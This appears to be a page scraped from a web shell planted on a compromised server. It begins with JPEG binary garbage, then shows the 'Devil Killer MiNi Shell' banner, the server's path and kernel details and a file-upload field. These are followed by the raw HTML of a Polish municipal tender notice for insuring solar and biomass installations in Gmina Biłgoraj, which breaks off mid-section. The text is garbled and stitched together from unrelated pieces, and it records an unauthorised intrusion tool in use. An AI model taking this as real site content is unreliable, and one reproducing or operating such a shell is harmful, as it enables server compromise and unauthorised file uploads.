JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20211123/0028026301-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Ubezpieczenie instalacji solarnych i pieców na biomasę zainstalowanych na terenie Gminy Biłgoraj </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Biłgoraj</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 950369037</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kościuszki 88</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Biłgoraj</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">23-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+846882876</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@gminabilgoraj.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://ugbilgoraj.bip.lubelskie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Ubezpieczenie instalacji solarnych i pieców na biomasę zainstalowanych na terenie Gminy Biłgoraj </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1cd51f87-4c4b-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00280263</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000379/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Ubezpieczenie majątku i innych interesów Gminy Biłgoraj</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://gminabilgoraj.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://gminabilgoraj.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest przy użyciu środków komunikacji elektronicznej – za pośrednictwem<br/>systemu teleinformatycznego, dostępnego na stronie internetowej pod adresem:<br/>https://gminabilgoraj.ezamawiajacy.pl<br/>2. System teleinformatyczny, o którym mowa powyżej, spełnia wymagania określone w u.p.z.p.,<br/>w szczególności w art. 64 i 68 ustawy oraz w § 11 Rozporządzenia Prezesa Rady Ministrów z dnia 30<br/>grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie.<br/>2.1. Do połączenia z systemem używany jest szyfrowany protokół HTTPS. Szyfrowanie danych odbywa<br/>się przy pomocy protokołu SSL. Certyfikat SSL zapewnia poufność transmisji danych przesyłanych<br/>przez Internet. Każdy wykonawca posiada w systemie dostęp do możliwości złożenia, zmiany,<br/>wycofania oferty, a także funkcjonalności pozwalających na zadawanie pytań do treści SWZ oraz<br/>komunikację z zamawiającym w pozostałych obszarach.<br/>2.2. Wymagania techniczne, które muszą spełniać urządzenia informatyczne w celu korzystania<br/>z systemu teleinformatycznego opisane zostały na stronie internetowej pod adresem:<br/>https://gminabilgoraj.ezamawiajacy.pl<br/>- Podłączenie do internetu: min. 512 kb/s na komputer (zalecane szerokopasmowe łącze internetowe);<br/>- Komputer klasy PC lub MAC z aktualnym systemem operacyjnym wspieranym przez producenta;<br/>- Zainstalowana dowolna przeglądarka internetowa wspierana przez producenta:<br/>MS Internet Explorer, Firefox, Google Chrome lub MS Edge;<br/>Zamawiający określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające prawidłowe<br/>złożenie kwalifikowanego podpisu elektronicznego:<br/>- zainstalowana bezpłatna wersje oprogramowania Oracle JAVA w wersji co najmniej 1.8.0_202 lub użycie JAVA w wersji oprogramowania OpenJDK wydanej licencji GPL. Rekomendowaną wersją jest<br/>AdoptOpenJDK, dostępną na stronie https://adoptopenjdk.net;<br/>- podłączony lub wbudowany do komputera czytnik karty kryptograficznej wydanej przez wystawcę<br/>certyfikatu używanego przez Wykonawcę;<br/>- certyfikat kwalifikowany zainstalowany na komputerze, na którym Wykonawca będzie się logował do<br/>konta (certyfikat musi być widoczny w magazynie logicznym certyfikatów systemu Windows o nazwie<br/>„Osobisty”).<br/>2.3. Dopuszczalne formaty przesyłanych danych: txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx,<br/>xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg,<br/>ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES,<br/>ASIC, XMLenc.<br/>2.4. Maksymalny rozmiar przesyłanych plików: do 100 MB<br/>2.5. Kodowanie i oznaczenie czasu przekazania danych: czas zapisywany jest w formacie YYYY-MMDD<br/>HH:MM:SS. Czas przekazania danych jest to czas, w którym zostanie potwierdzone złożenie oferty<br/>lub dokumentu przez wykonawcę. W przypadku wybrania opcji złożenia oferty lub dokumentu bez<br/>logowania, potwierdzenie odbywa się poprzez kliknięcie w link dostępny w wiadomości e-mail,<br/>wysłanej automatycznie po złożeniu oferty lub dokumentu. Wykonawca otrzymuje wiadomość na<br/>wskazany przez siebie adres e-mail. W przypadku wykonawcy zalogowanego w systemie<br/>teleinformatycznym, czas przekazania danych jest to czas wysłania dokumentu lub oferty przez<br/>system.<br/>2.6. Szczegółowe instrukcje dla wykonawców znajdują się na stronie:<br/>https://gminabilgoraj.ezamawiajacy.pl lub https://oneplace.marketplanet.pl<br/>2.7. Regulamin systemu teleinformatycznego dostępny jest pod adresem:<br/>https://gminabilgoraj.ezamawiajacy.pl lub https://oneplace.marketplanet.pl<br/>2.8. Pełną obsługę techniczną systemu teleinformatycznego świadczy jego administrator, Platforma<br/>zakupowa Gminy Biłgoraj W przypadku ewentualnych problemów technicznych należy kontaktować się<br/>z infolinią tel. +48 22 257 22 23 (infolinia dostępna w dni robocze, w godzinach 9.00-17.00) e-mail:<br/>oneplace@marketplanet.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, Zamawiający<br/>informuje, że:<br/>1) Jest administratorem danych osobowych Wykonawcy oraz osób, których dane Wykonawca<br/>przekazał w niniejszym postępowaniu;<br/>dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego na zadanie pn.: „Ubezpieczenie<br/>majątku i innych interesów Gminy Biłgoraj“ prowadzonym<br/>w trybie podstawowym;<br/>2) odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. Prawo<br/>zamówień publicznych (Dz. U. z 2021 r. poz. 1129), dalej „ustawa Pzp”;<br/>3) dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres<br/>4 lat od dnia zakończenia postępowania o udzielenie zamówienia, w sposób gwarantujący jego<br/>nienaruszalność.<br/>4) obowiązek podania przez Wykonawcę danych osobowych bezpośrednio go dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym<br/>z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania<br/>określonych danych wynikają z ustawy Pzp;<br/>5) w odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">6) Wykonawca posiada:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy;<br/>− na podstawie art. 16 RODO prawo do sprostowania danych osobowych, o ile ich zmiana nie skutkuje<br/>zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w<br/>zakresie niezgodnym z ustawą Pzp oraz nie narusza integralności protokołu oraz jego załączników;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych,<br/>gdy Wykonawca uzna, że przetwarzanie jego danych osobowych narusza przepisy RODO;<br/>7) Wykonawcy nie przysługuje:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO.<br/>W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia<br/>2016/679, wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której<br/>dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w<br/>szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub<br/>konkursu.<br/>Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania<br/>lub uzupełnienia danych osobowych, o którym mowa w art. 16 rozporządzenia 2016/679, nie może<br/>skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub konkursu ani<br/>zmianą postanowień umowy w zakresie niezgodnym z ustawą.<br/>Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia<br/>publicznego lub konkursu.<br/>W przypadku danych osobowych zamieszczonych przez Zamawiającego w Biuletynie Zamówień<br/>Publicznych, prawa, o których mowa w art. 15 i art. 16 rozporządzenia 2016/679, są wykonywane<br/>w drodze żądania skierowanego do Zamawiającego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.2.11.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest Ubezpieczenie instalacji solarnych i pieców na biomasę Gminy Biłgoraj. <br/>Zakres ubezpieczenia obejmuje:<br/>1)	ubezpieczenie mienia od wszystkich ryzyk,<br/>5.2.	Szczegółowy opis przedmiotu zamówienia zawierają następujące załączniki do SWZ:<br/>Załącznik nr 1: Szczegółowy opis przedmiotu zamówienia zawierający postanowienia obligatoryjne dotyczące realizacji zamówienia oraz dane do oceny ryzyka<br/>Załącznik nr 1a: Szczegółowy opis przedmiotu zamówienia zawierający warunki obligatoryjne oraz klauzule dodatkowe i inne postanowienia szczególne fakultatywne dla ubezpieczenia instalacji solarnych i pieców na biomasę zainstalowane na terenie Gminy Biłgoraj, <br/>Załącznik nr 1b: Szczegółowy opis przedmiotu zamówienia zawierający warunki obligato-ryjne – definicje pojęć i obligatoryjną treść klauzul dodatkowych, <br/>Załącznik nr 1c: Szczegółowy opis przedmiotu zamówienia zawierający klauzule dodatkowe i inne postanowienia szczególne fakultatywne, </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66510000-8 - Usługi ubezpieczeniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">66515000-3 - Usługi ubezpieczenia od uszkodzenia lub utraty</p> <p class="mb-0">66515100-4 - Usługi ubezpieczenia od ognia</p> <p class="mb-0">66515400-7 - Usługi ubezpieczenia od skutków żywiołów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z Rozdziałem 21 SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">klauzule dodatkowe i inne postanowienia szczególne fakultatywne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki<br/>udziału w postępowaniu, określone w art. 112 ust. 2 pkt 2 i w art. 114 u.p.z.p., dotyczące<br/>posiadania odpowiedniego zezwolenia, licencji, koncesji lub wpisu do rejestru działalności<br/>regulowanej, jeżeli ich posiadanie jest niezbędne do świadczenia usług ubezpieczeniowych w<br/>kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">5. Na podstawie art. 128 ust. 1 u.p.z.p. w związku z § 3 Rozporządzenie Ministra Rozwoju, Pracy<br/>i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych<br/>dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy, w celu potwierdzenia<br/>braku podstaw wykluczenia wykonawcy z udziału w postępowaniu o udzielenie zamówienia<br/>publicznego, zamawiający wezwie wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia<br/>w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, oświadczenia wykonawcy o<br/>aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 u.p.z.p., w zakresie<br/>art. 108 ust 1 pkt 5 u.p.z.p. - postanowienie niniejsze dotyczy wyłącznie sytuacji, gdy na tę samą część<br/>zamówienia oferty złożą wykonawcy należący do tej samej grupy kapitałowej w rozumieniu ustawy z<br/>dnia 16 lutego 2007 r. o ochronie konkurencji<br/>i konsumentów.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Zgodnie z art. 125 ust. 1 u.p.z.p., do oferty wykonawca dołącza<br/>oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, w zakresie<br/>wskazanym przez zamawiającego we wzorze, stanowiącym załącznik nr 3 do niniejszej SWZ.<br/>2. Oświadczenie, o którym mowa w punkcie poprzedzającym, stanowi dowód potwierdzający brak<br/>podstaw wykluczenia i spełnianie warunków udziału w postępowaniu na dzień składania ofert.<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym<br/>mowa w art. 125 ust. 1 u.p.z.p., składa każdy z wykonawców. Oświadczenia te potwierdzają brak<br/>podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z<br/>wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4. Zamawiający nie będzie wymagał złożenia przez wykonawców dodatkowych, innych niż<br/>oświadczenie wymienione w art. 125 ust. 1 u.p.z.p., podmiotowych środków dowodowych,<br/>potwierdzających niepodleganie wykluczeniu z postępowania i spełnianie warunków udziału w<br/>postępowaniu, w drodze wyjątku z zastrzeżeniem okoliczności, o których mowa w art. 108 ust 1 pkt 5<br/>u.p.z.p., tj. gdy na tę samą część zamówienia odrębne oferty złożą wykonawcy należący do tej samej<br/>grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów<br/>– zgodnie z postanowieniem pkt. 11.5 SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawcy zobowiązani są złożyć następujące dokumenty oraz oświadczenia:<br/>1. formularz oferty, z wykorzystaniem wzoru stanowiącego załącznik nr 2 do niniejszej SWZ;<br/>w przypadku składania oferty przez wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia należy podać nazwy (firmy) oraz dokładne adresy wszystkich wykonawców<br/>składających wspólną ofertę,<br/>2. oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, o<br/>którym mowa w art. 125 ust. 1 u.p.z.p., z wykorzystaniem wzoru stanowiącego załącznik nr 3 do<br/>niniejszej SWZ,<br/>3. pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w<br/>postępowaniu<br/>i zawarcia umowy, w przypadku wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia,<br/>4. pełnomocnictwo do występowania w imieniu wykonawcy w przypadku, gdy dokumentów<br/>składających się na ofertę nie podpisuje osoba uprawniona do reprezentowania wykonawcy<br/>zgodnie z dokumentem rejestrowym wykonawcy.<br/>6. Pełnomocnictwa, o których mowa powyżej, powinny być złożone w postaci (formie)<br/>dokumentu elektronicznego, opatrzonego kwalifikowanym podpisem elektronicznym lub<br/>podpisem zaufanym, lub podpisem osobistym.<br/>6.1. W przypadku, gdy pełnomocnictwo zostało sporządzone jako dokument w postaci (formie)<br/>papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego<br/>dokumentu opatrzone kwalifikowanym podpisem elektronicznym lub podpisem zaufanym, lub<br/>podpisem osobistym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej.<br/>6.2. Poświadczenia zgodności cyfrowego odwzorowania pełnomocnictwa z dokumentem w<br/>postaci (formie) papierowej dokonuje mocodawca. Poświadczenia takiego może dokonać<br/>również notariusz. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) 